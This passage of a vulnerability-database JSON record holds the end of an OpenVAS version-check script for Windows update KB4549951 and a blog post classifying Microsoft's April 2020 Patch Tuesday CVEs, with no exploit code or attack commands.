\"CVE-2020-0985\", \"CVE-2020-0987\", \"CVE-2020-0988\",\n \"CVE-2020-0992\", \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\",\n \"CVE-2020-0996\", \"CVE-2020-0999\", \"CVE-2020-1000\", \"CVE-2020-1001\",\n \"CVE-2020-1003\", \"CVE-2020-1004\", \"CVE-2020-1005\", \"CVE-2020-1006\",\n \"CVE-2020-1007\", \"CVE-2020-1008\", \"CVE-2020-1009\", \"CVE-2020-1011\",\n \"CVE-2020-1014\", \"CVE-2020-1015\", \"CVE-2020-1016\", \"CVE-2020-1017\",\n \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1029\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4549951)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4549951\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1903 for 32-bit/x64-based Systems\n\n - Microsoft Windows 10 Version 1909 for 32-bit/x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4549951\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_in_range(version:fileVer, test_version:\"10.0.18362.0\", test_version2:\"10.0.18362.777\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:fileVer, vulnerable_range:\"10.0.18362.0 - 10.0.18362.777\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2020-08-07T08:03:36", "description": "## Easiest task ever?\n\nMaking the reviews of Microsoft Patch Tuesday vulnerabilities should be an easy task. All vulnerability data is publicly available. Even better, dozens of reviews have already been written. Just read them, combine and post. Right? \n\n![Microsoft Patch Tuesday April 2020: my classification script, confusing RCE in Adobe Type Manager and updates for older vulnerabilities\n](https://avleonov.com/wp-content/uploads/2020/04/MicrosoftPatchTuesdayApril2020.png)\n\nNot really. In fact it is quite boring and annoying. It may be fun to write about vulnerabilities that were already used in some real attacks. But this is a very small part of all vulnerabilities. What about more than a hundred others? They are like \u201csome vulnerability in some component may be used in some attack (or may be not)\u201d. If you describe each of them, no one will read or listen this. \n\nYou must choose what to highlight. And when I am reading the reports from [Tenable](<https://www.tenable.com/blog/microsoft-april-2020-patch-tuesday-addresses-113-cves-including-adobe-type-manager-library>), [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>) and [ZDI](<https://www.thezdi.com/blog/2020/4/14/the-april-2020-security-update-review>), I see that they choose very different groups of vulnerabilities, pretty much randomly.\n\n## My classification script\n\nThat's why I created a script that takes Patch Tuesday CVE data from microsoft.com and visualizes it giving me helicopter view on what can be interesting there. With nice grouping by vulnerability type and product, with custom icons for vulnerability types, coloring based on severity, etc.\n\n## Exploited in the wild\n\nApril 2020 Microsoft Patch Tuesday was published on 14.04.2020 and addressed 113 CVEs. 2 CVEs less than in March, but still too many to discuss them separately. 18 CVEs are critical (other reports say 19, but you can count it yourself) and 3 were exploited in the wild. These 3 are the most interesting, I've got them by "exploited" parameter in Microsoft CVE data.\n\n### Exploitation detected (3)\n\n#### ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution\n\n * Adobe Font Manager Library ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>))\n\n#### ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege\n\n * Windows Kernel ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>))\n\nMicrosoft has finally released a patch for the Adobe Type Manager vulnerability (CVE-2020-1020). The advisory [ADV200006](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006>) appeared on Microsoft website 23.03.2020, 3 week before this patch. The advisory stated, that this vulnerability was used in targeted attack in the wild. That's why it was discussed a lot. The idea is simple. If you open a special file or preview it in Explorer, remote code execution will occur. It is noted that previewing it in Microsoft Outlook is safe. This vulnerability is great for phishing attacks, in addition, it is also possible to exploit it through Web Distributed Authoring and Versioning (WebDAV). It is an extension of the HTTP that allows clients to perform remote Web content authoring operations. It is used, for example, in Microsoft SharePoint or ownCloud. And Microsoft claims that exploitation through WebDAV is the most likely attack vector.\n\nI called this vulnerability "confusing" in the title because:\n\n> To be clear and despite its name, this is *not* Adobe code. Microsoft was given the source code for ATM Light for inclusion in Windows 2000/XP. After that, Microsoft took 100% responsibility for maintaining the code.\n> \n> -- Rosyna Keller (@rosyna) [March 23, 2020](<https://twitter.com/rosyna/status/1242156545346916352?ref_src=twsrc%5Etfw>)\n\n 1. It has "Adobe" in the name, but is not really related to Adobe. Adobe gave Microsoft the source code of ATM Light for inclusion in Windows 2000/XP. Microsoft maintained this source code after that.\n 2. Microsoft initially stated that RCE exists in 40 version of Windows from Windows 7 to Windows 10 and from Windows Server 2008 to Windows Server 2019. And this is huge. But then they added that exploitation was detected only for Windows 7. And they "do not recommend that IT administrators running Windows 10 implement the workarounds described" in advisory. For Windows Server 2016 and Windows Server 2019 the vulnerability is only "Important", not "Critical". And the most vulnerable systems won't get the updates by default: "to receive the security update for this vulnerability for Windows 7, Windows Server 2008, or Windows Server 2008 R2 you must have an ESU license". Yet another good reason to upgrade to a newer version.\n 3. The CVE number for this vulnerability was only assigned 3 weeks after it became publicly known. Before that, everyone called it by advisory ID ADV200006. So, CVE is not the ultimate identifier for vulnerabilities. And if you use only CVEs, some vulnerabilities will be out of scope. \n\nAnother vulnerability in the Adobe Font Manager Library (CVE-2020-0938) is very similar to previous CVE-2020-1020, although it impacts a different font renderer.\n\nThe last exploited vulnerability is the Elevation of Privilege (EoP) in Windows kernel (CVE-2020-1027). To exploit the vulnerability, a locally authenticated attacker should run a specially crafted application. Also all versions of Windows from Windows 7 to Windows 10 and from Windows Server 2008 to Windows Server 2019 are vulnerable.\n\n> We discovered CVE-2020-1027 being exploited in the wild and reported it on 23 March under a 7-day deadline (used only for actively exploited bugs). Microsoft asked for an extension due to current global circumstances and we agreed. Patch details at <https://t.co/VF3SqXHYV9> (1/2)\n> \n> -- Tim Willis (@itswillis) [April 14, 2020](<https://twitter.com/itswillis/status/1250116355602419713?ref_src=twsrc%5Etfw>)\n\n## More likely to be exploited\n\nWhat else can be interesting? I filtered the CVEs with "Exploitation more likely" flag for current and older versions. \n\nAs you can see, the most interesting vulnerability is Scripting Engine Memory Corruption Vulnerability (CVE-2020-0968), which in fact affects Internet Explorer. An attacker can make a specially crafted website that is designed to exploit the vulnerability through Internet Explorer, or use the embedded an ActiveX control in application or Microsoft Office document. As a result, an attacker can execute arbitrary code in the context of the current user.\n\n### Exploitation more likely (7)\n\n#### ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution\n\n * Internet Explorer ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>))\n\n#### ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege\n\n * DirectX ([CVE-2020-0784](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0784>), [CVE-2020-0888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0888>))\n * Windows Graphics Component ([CVE-2020-1004](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1004>))\n * Windows Kernel ([CVE-2020-0956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0956>), [CVE-2020-0957](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0957>), [CVE-2020-0958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0958>))\n\nOther more likely to be exploitable vulnerabilities are Elevation of Privilege in DirectX, Windows Graphics Component and Windows Kernel. Not much information is available for them. "An attacker could exploit this vulnerability by running a specially crafted application to take control over the affected system".\n\n## Groups by product\n\nWhat about other 103 vulnerabilities that are less likely to be exploited according to Microsoft. I made groups for products with more then 5 vulnerabilities.\n\n### Other Product based (52)\n\n#### Jet Database Engine\n\n * ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution ([CVE-2020-0889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0889>), [CVE-2020-0953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0953>), [CVE-2020-0959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0959>), [CVE-2020-0960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0960>), [CVE-2020-0988](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0988>), [CVE-2020-0992](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0992>), [CVE-2020-0994](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0994>), [CVE-2020-0995](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0995>), [CVE-2020-0999](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0999>), [CVE-2020-1008](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1008>))\n\n#### Media Foundation\n\n * ![](http://www.avleonov.com/vulnicons/memcor.png)Memory Corruption ([CVE-2020-0948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0948>), [CVE-2020-0949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0949>), [CVE-2020-0950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0950>))\n * ![](http://www.avleonov.com/vulnicons/infdis.png)Information Disclosure ([CVE-2020-0937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0937>), [CVE-2020-0939](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0939>), [CVE-2020-0945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0945>), [CVE-2020-0946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0946>), [CVE-2020-0947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0947>))\n\n#### Microsoft SharePoint\n\n * ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution ([CVE-2020-0920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0920>), [CVE-2020-0971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0971>), [CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>), [CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>), [CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>), [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>))\n * ![](http://www.avleonov.com/vulnicons/xss.png)Cross Site Scripting ([CVE-2020-0923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0923>), [CVE-2020-0924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0924>), [CVE-2020-0925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0925>), [CVE-2020-0926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0926>), [CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>), [CVE-2020-0930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0930>), [CVE-2020-0933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0933>), [CVE-2020-0954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0954>), [CVE-2020-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0973>), [CVE-2020-0978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0978>))\n * ![](http://www.avleonov.com/vulnicons/spoofing.png)Spoofing ([CVE-2020-0972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0972>), [CVE-2020-0975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0975>), [CVE-2020-0976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0976>), [CVE-2020-0977](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0977>))\n\n#### Windows\n\n * ![](http://www.avleonov.com/vulnicons/dos.png)Denial of Service ([CVE-2020-0794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0794>))\n * ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege ([CVE-2020-0934](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0934>), [CVE-2020-0983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0983>), [CVE-2020-1009](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1009>), [CVE-2020-1011](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1011>), [CVE-2020-1015](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015>))\n\n#### Windows Kernel\n\n * ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege ([CVE-2020-0913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0913>), [CVE-2020-1000](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1000>), [CVE-2020-1003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1003>))\n * ![](http://www.avleonov.com/vulnicons/infdis.png)Information Disclosure ([CVE-2020-0699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0699>), [CVE-2020-0821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0821>), [CVE-2020-0955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0955>), [CVE-2020-0962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0962>), [CVE-2020-1007](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1007>))\n\nSo, the most interesting groups are Jet Database Engine and Microsoft SharePoint, both have RCEs. \n\n## Groups by vulnerability type\n\nAll other vulnerabilities in different products I combined by vulnerability type. Interesting EoP in OneDrive for Windows, but "most customers have been protected from this vulnerability because OneDrive has its own updater that periodically checks and updates the OneDrive binary".\n\n### Other Vulnerability Type based (51)\n\n#### ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution\n\n * Chakra Scripting Engine ([CVE-2020-0969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0969>), [CVE-2020-0970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0970>))\n * Dynamics Business Central ([CVE-2020-1022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1022>))\n * GDI+ ([CVE-2020-0964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0964>))\n * Microsoft Excel ([CVE-2020-0906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0906>), [CVE-2020-0979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0979>))\n * Microsoft Graphics ([CVE-2020-0687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0687>))\n * Microsoft Graphics Components ([CVE-2020-0907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0907>))\n * Microsoft Office ([CVE-2020-0760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0760>), [CVE-2020-0991](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0991>))\n * Microsoft Office Access Connectivity Engine ([CVE-2020-0961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0961>))\n * Microsoft Windows Codecs Library ([CVE-2020-0965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0965>))\n * Microsoft Word ([CVE-2020-0980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0980>))\n * VBScript ([CVE-2020-0895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0895>), [CVE-2020-0966](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0966>), [CVE-2020-0967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0967>))\n * Windows Hyper-V ([CVE-2020-0910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910>))\n\n#### ![](http://www.avleonov.com/vulnicons/auth_bypass.png)Authentication Bypass\n\n * Microsoft YourPhone Application for Android ([CVE-2020-0943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0943>))\n\n#### ![](http://www.avleonov.com/vulnicons/dos.png)Denial of Service\n\n * Windows DNS ([CVE-2020-0993](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0993>))\n\n#### ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege\n\n * Connected User Experiences and Telemetry Service ([CVE-2020-0942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0942>), [CVE-2020-0944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0944>), [CVE-2020-1029](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1029>))\n * Microsoft (MAU) Office ([CVE-2020-0984](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0984>))\n * Microsoft Defender ([CVE-2020-0835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0835>), [CVE-2020-1002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1002>))\n * Microsoft RMS Sharing App for Mac ([CVE-2020-1019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1019>))\n * Microsoft Remote Desktop App for Mac ([CVE-2020-0919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0919>))\n * Microsoft Visual Studio ([CVE-2020-0899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0899>))\n * Microsoft Windows Update Client ([CVE-2020-1014](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1014>))\n * OneDrive for Windows ([CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>))\n * Visual Studio Extension Installer Service ([CVE-2020-0900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0900>))\n * Windows Hyper-V ([CVE-2020-0917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0917>), [CVE-2020-0918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0918>))\n * Windows Push Notification Service ([CVE-2020-0940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0940>), [CVE-2020-1001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1001>), [CVE-2020-1006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1006>), [CVE-2020-1017](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1017>))\n * Windows Scheduled Task ([CVE-2020-0936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0936>))\n * Windows Update Stack ([CVE-2020-0985](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0985>), [CVE-2020-0996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0996>))\n * Windows Work Folder Service ([CVE-2020-1094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1094>))\n\n#### ![](http://www.avleonov.com/vulnicons/sf_bypass.png)Security Feature Bypass\n\n * MSR JavaScript Cryptography Library ([CVE-2020-1026](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1026>))\n * Windows Token ([CVE-2020-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0981>))\n\n#### ![](http://www.avleonov.com/vulnicons/infdis.png)Information Disclosure\n\n * Microsoft Dynamics Business Central/NAV ([CVE-2020-1018](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1018>))\n * Microsoft Graphics Component ([CVE-2020-0982](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0982>), [CVE-2020-0987](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0987>), [CVE-2020-1005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1005>))\n * Windows GDI ([CVE-2020-0952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0952>))\n * Windows Push Notification Service ([CVE-2020-1016](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1016>))\n\n#### ![](http://www.avleonov.com/vulnicons/xss.png)Cross Site Scripting\n\n * Microsoft Dynamics 365 (On-Premise) ([CVE-2020-1049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1049>), [CVE-2020-1050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1050>))\n\nZero Day Initiative recommends to note Denial-of-Service in the Windows DNS service (CVE-2020-0993). "Considering the damage that could be done by an unauthenticated attacker". At the same time Microsoft website says: "To exploit the vulnerability, an **authenticated** attacker could send malicious DNS queries to a target, resulting in a denial of service". It seems like a mistake on ZDI or MS, but worth mentioning.\n\n## Updates for older vulners\n\nSo, that's it for April Patch Tuesday. What about the interesting vulnerabilities from February and March?\n\n 1. CVE-2020-0796 - Windows SMBv3 Client/Server Remote Code Execution Vulnerability. New exploit now available for this vulnerability, it's even in Metasplot. But it's not the one you have probably waited for. It does not attack remote hosts, it's [a local exploit for "(hopefully privileged) payload execution"](<https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2020_0796_SMBGHOST>). \n**upd.** While I was working on this post I missed the news about CVE-2020-0796 RCE POC by Ricerca Security. The code is not available, here is [technical description](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) and [video](<https://vimeo.com/409855578>).\n 2. CVE-2020-0688 - Microsoft Exchange server "single e-mail" seizure. Exploit exists. Rapid7 made a [nice report](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>) "What we found was that **at least** 357,629 (82.5%) of the 433,464 Exchange servers we observed were known to be vulnerable."\n 3. CVE-2020-0684 - .LNK files processing. Nothing new.\n 4. CVE-2020-0662 - Mysterious Windows RCE. Nothing new.\n![](http://feeds.feedburner.com/~r/avleonov/~4/0BOlzDUoVDc)", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-26T01:24:38", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2020: my classification script, confusing RCE in Adobe Type Manager and updates for older vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0662", "CVE-2020-0684", "CVE-2020-0687", "CVE-2020-0688", "CVE-2020-0699", "CVE-2020-0760", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0796", "CVE-2020-0821", "CVE-2020-0835", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0899", "CVE-2020-0900", "CVE-2020-0906", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0919", "CVE-2020-0920", "CVE-2020-0923", "CVE-2020-0924", "CVE-2020-0925", "CVE-2020-0926", "CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0930", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0933", "CVE-2020-0934", "CVE-2020-0935", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0939", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0943", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0947", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0954", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0961", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0971", "CVE-2020-0972", "CVE-2020-0973", "CVE-2020-0974", "CVE-2020-0975", "CVE-2020-0976", "CVE-2020-0977", "CVE-2020-0978", "CVE-2020-0979", "CVE-2020-0980", "CVE-2020-0981", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0984", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0991", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1002", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1018", "CVE-2020-1019", "CVE-2020-1020", "CVE-2020-1022", "CVE-2020-1026", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1049", "CVE-2020-1050", "CVE-2020-1094"], "modified": "2020-04-26T01:24:38", "id": "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "href": "http://feedproxy.google.com/~r/avleonov/~3/0BOlzDUoVDc/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}